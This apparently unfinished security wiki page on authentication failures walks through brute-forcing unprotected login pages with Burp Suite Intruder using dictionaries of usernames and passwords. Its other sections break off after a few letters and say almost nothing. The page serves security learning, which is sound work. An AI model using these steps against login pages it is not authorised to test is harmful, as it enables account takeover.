Authentication Failures (WIP)

Summary

Common types of

  • Detailed

Exploitation Techniques

It's

Username and Password Brute-Force with BurpSuite Intruder

This could be used in authentication sites, like login pages that do not have protections against brute-force attacks, such as max login attempts, temporary lock, rate limit, or CAPTCHA, among others. We can use Burp Suite to make a brute-force attack using dictionaries or well-known usernames and passwords.

  • Intercept a petition to the target endpoint using the Proxy tab, right-click the petition, and hit Send to Intruder

  • Go to the Intruder tab, then select the target field to be changed and hit the Add button

  • Check that the desired field is surrounded by symbols, which means it has been selected properly. Then, in the right panel, add the desired payloads or set dictionaries, and hit the Start Attack button on top

  • Another window will be displayed with the petitions and their values. Here, the results can be compared to check if we receive different responses, the length of them, or other interesting values that could indicate that we have valid credentials

Technique 2

The

  • Check 

d

  • A

c

Impact

It c

  • Rec

Inform

Mitigation Strategies

It cou

  • Awar

Checklist for Developers and Sysadmins

  • Are

PreviousCryptographic Failures (WIP)NextRemote File Inclusion (WIP)

Last updated